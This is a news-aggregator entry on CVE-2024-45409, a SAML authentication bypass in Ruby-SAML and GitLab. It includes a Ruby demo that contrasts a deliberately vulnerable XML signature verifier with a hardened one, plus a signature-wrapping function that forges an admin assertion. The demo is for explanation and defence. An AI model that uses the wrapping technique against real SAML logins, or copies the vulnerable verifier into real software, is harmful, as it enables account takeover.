CyberSecurity updates
Updated: 2024-10-22 05:25:43 Pacific

about.gitlab.com
Exploiting SAML Vulnerability CVE-2024-45409 in GitLab and Ruby-SAML - 6d

Read more: about.gitlab.com

CVE-2024-45409 is a critical vulnerability in the Ruby-SAML library that lets an attacker forge SAML responses and bypass authentication. The root cause is an incorrect XPath selector in the signature-verification code: the signature of a SAML Response or Assertion is not tied to the element the library then goes on to trust, so the signature check passes without actually covering the assertion that grants access. Affected versions are Ruby-SAML up to and including 1.12.2 and 1.13.0 through 1.16.0; the fix shipped in 1.12.3 and 1.17.0. An attacker who holds any SAML document signed by the identity provider (for example, an assertion issued for their own account) can craft a SAML Response or Assertion with arbitrary contents that passes verification, log in as another user, and so reach sensitive data and critical systems. Self-managed GitLab instances using SAML SSO were affected, and GitLab issued patched releases as an important security update; because the bypass does not defeat a second factor, enabling two-factor authentication for all users is a useful mitigation while patching.
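As an added illustration (it is not ruby-saml's code and not a reproduction of the actual CVE-2024-45409 exploit), the Ruby script below models the bug class the summary describes: a verifier that locates the signature and the signed element with document-wide XPath selectors (`//ds:Signature`, `//*[@ID=$id]`) instead of starting from the element it is about to trust, next to a verifier that ties the two together. Real XML-DSig canonicalisation and the SAML schema are replaced by a deliberately small stand-in (`c14n`), the IdP key, user names and assertion IDs are constructed for the demo, and the "signature wrapping" document shape is a generic one, not the specific payload used against GitLab.

```ruby
require 'rexml/document'
require 'openssl'
require 'base64'
require 'digest'

DS   = 'http://www.w3.org/2000/09/xmldsig#'
SAML = 'urn:oasis:names:tc:SAML:2.0:assertion'
NS   = { 'ds' => DS, 'saml' => SAML, 'samlp' => 'urn:oasis:names:tc:SAML:2.0:protocol' }
IDP_KEY = OpenSSL::PKey::RSA.new(2048) # constructed IdP signing key, demo only

# Stand-in for XML canonicalisation: sorted attributes, trimmed text, and the
# element's own ds:Signature left out (the enveloped-signature transform).
def c14n(el)
  return '' if el.name == 'Signature' && el.namespace == DS
  attrs = []
  el.attributes.each_attribute { |a| attrs << " #{a.expanded_name}=\"#{a.value}\"" }
  inner = el.children.map do |c|
    case c
    when REXML::Element then c14n(c)
    when REXML::Text then c.value.strip
    else ''
    end
  end.join
  "<#{el.expanded_name}#{attrs.sort.join}>#{inner}</#{el.expanded_name}>"
end

def digest_of(el)
  Base64.strict_encode64(Digest::SHA256.digest(c14n(el)))
end

# IdP side: a Response whose Assertion carries an enveloped signature.
def idp_issue(name_id, assertion_id)
  doc = REXML::Document.new(<<~XML)
    <samlp:Response xmlns:samlp="#{NS['samlp']}" xmlns:saml="#{SAML}" xmlns:ds="#{DS}">
      <samlp:Status><samlp:StatusCode Value="urn:oasis:names:tc:SAML:2.0:status:Success"/></samlp:Status>
      <saml:Assertion ID="#{assertion_id}"><saml:Subject><saml:NameID>#{name_id}</saml:NameID></saml:Subject></saml:Assertion>
    </samlp:Response>
  XML
  assertion = REXML::XPath.first(doc, '//saml:Assertion', NS)
  sig = assertion.add_element('ds:Signature')
  si  = sig.add_element('ds:SignedInfo')
  si.add_element('ds:Reference', 'URI' => "##{assertion_id}").add_element('ds:DigestValue').text = digest_of(assertion)
  sig.add_element('ds:SignatureValue').text =
    Base64.strict_encode64(IDP_KEY.sign(OpenSSL::Digest.new('SHA256'), c14n(si)))
  doc.to_s
end

# Verifies the RSA signature over SignedInfo; returns [referenced ID, claimed
# digest] or nil. Shared by both verifiers: only the element selection differs.
def check_signed_info(sig, pubkey)
  si  = REXML::XPath.first(sig, './ds:SignedInfo', NS)
  ref = REXML::XPath.first(si, './ds:Reference', NS)
  sv  = Base64.decode64(REXML::XPath.first(sig, './ds:SignatureValue', NS).text)
  return nil unless pubkey.verify(OpenSSL::Digest.new('SHA256'), sv, c14n(si))
  [ref.attributes['URI'].delete_prefix('#'), REXML::XPath.first(ref, './ds:DigestValue', NS).text]
end

# VULNERABLE: document-wide selectors. Any ds:Signature anywhere is checked, the
# digest is compared against whichever element first carries the referenced ID,
# and the Assertion finally trusted is selected independently of both.
def vulnerable_name_id(xml, pubkey)
  doc = REXML::Document.new(xml)
  sig = REXML::XPath.first(doc, '//ds:Signature', NS)
  return nil unless sig
  ref_id, claimed = check_signed_info(sig, pubkey)
  return nil unless ref_id
  hashed = REXML::XPath.first(doc, '//*[@ID=$id]', NS, { 'id' => ref_id })
  return nil unless hashed && digest_of(hashed) == claimed
  assertion = REXML::XPath.first(doc, '/samlp:Response/saml:Assertion', NS)
  REXML::XPath.first(assertion, './/saml:NameID', NS).text
end

# HARDENED: start from the element that will be trusted, insist its signature is
# its own child and the only one in the document, require the Reference to name
# that element, and hash that element instead of re-locating it by ID.
def hardened_name_id(xml, pubkey)
  doc = REXML::Document.new(xml)
  assertion = REXML::XPath.first(doc, '/samlp:Response/saml:Assertion', NS)
  return nil unless assertion && REXML::XPath.match(doc, '//ds:Signature', NS).size == 1
  sig = REXML::XPath.first(assertion, './ds:Signature', NS)
  return nil unless sig
  ref_id, claimed = check_signed_info(sig, pubkey)
  return nil unless ref_id && ref_id == assertion.attributes['ID'] && digest_of(assertion) == claimed
  REXML::XPath.first(assertion, './/saml:NameID', NS).text
end

# Signature wrapping (generic shape): the IdP's signed Assertion is kept intact but
# moved into an extension point, and an unsigned Assertion for the victim is put
# where the verifier looks for the one to trust.
def wrap_attack(signed_xml, victim)
  original = REXML::XPath.first(REXML::Document.new(signed_xml), '//saml:Assertion', NS).to_s
  <<~XML
    <samlp:Response xmlns:samlp="#{NS['samlp']}" xmlns:saml="#{SAML}" xmlns:ds="#{DS}">
      <samlp:Status>
        <samlp:StatusCode Value="urn:oasis:names:tc:SAML:2.0:status:Success"/>
        <samlp:StatusDetail>#{original}</samlp:StatusDetail>
      </samlp:Status>
      <saml:Assertion ID="_forged"><saml:Subject><saml:NameID>#{victim}</saml:NameID></saml:Subject></saml:Assertion>
    </samlp:Response>
  XML
end

if __FILE__ == $PROGRAM_NAME
  pub = IDP_KEY.public_key
  genuine = idp_issue('alice', '_a1')
  wrapped = wrap_attack(genuine, 'admin')
  puts "genuine -> vulnerable: #{vulnerable_name_id(genuine, pub).inspect}, hardened: #{hardened_name_id(genuine, pub).inspect}"
  puts "wrapped -> vulnerable: #{vulnerable_name_id(wrapped, pub).inspect}, hardened: #{hardened_name_id(wrapped, pub).inspect}"
end
```

Both verifiers do the same RSA and digest arithmetic and both accept the genuine response for alice; only the vulnerable one also accepts the wrapped document and returns admin, because every cryptographic check it performs is satisfied by the untouched original assertion sitting inside StatusDetail. The hardening is not more crypto but tighter selection: the signature must be a child of the assertion being trusted, it must be the only signature in the document, the Reference URI must equal that assertion's own ID, and the digest is computed over that assertion rather than over "the first element with that ID". Those are the checks to look for when reviewing any SAML or XML-DSig consumer, whatever library it uses.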


This site is an experimental news aggregator using feeds I personally follow. You can reach me using contacts documented at my website here (https://royans.net/) if you have feedback. You can also find Flathis at Mastodon.